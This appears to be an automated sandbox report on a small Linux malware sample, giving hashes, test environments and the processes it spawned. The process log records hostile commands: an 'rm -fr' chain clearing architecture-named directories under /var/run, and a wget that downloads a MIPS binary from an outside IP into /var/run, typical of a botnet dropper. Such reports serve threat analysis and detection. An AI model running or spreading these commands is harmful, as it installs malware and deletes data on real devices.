Analysis
-
max time kernel
30632s -
max time network
154s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhf image:debian9-armhf-en-20211208 kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
27-11-2022 09:49
Static task
static1
Behavioral task
behavioral1
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-mipsbe-20221111-en
Behavioral task
behavioral4
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-mipsel-en-20211208
General
-
Target
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
-
Size
1005B
-
MD5
11496369b067c3c4f8db7e61546dcf6d
-
SHA1
baf395ac8359c4a92e634fad39d8f0c549f02b75
-
SHA256
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
-
SHA512
61172c41174bac18d4023e917ec097c4f901909dcdd32c5888cffa114ce12c22ac4e42c042f45e059cc65dd2721d7393633d6867a4e007c6ca7a82cbd5299fb0
Malware Config
Signatures
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes (03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8):
description ioc process
ioc: /tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
process: /tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Processes
-
/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8 (command line: /tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8, pid 1)
- Writes file to tmp directory
-
  child: /bin/rm (command line: rm -fr /var/run/mipsel rm -fr /var/run/mips rm -fr /var/run/arm rm -fr /var/run/ppc rm -fr /var/run/powerpc rm -fr /var/run/sh4 rm -fr /var/run/sh rm -fr /var/run/murda rm -fr /var/run/x86_64 rm -fr /var/run/superh, pid 2)
-
  child: /usr/bin/wget (command line: wget -c http://198.27.124.29/mipsel -P /var/run, pid 2)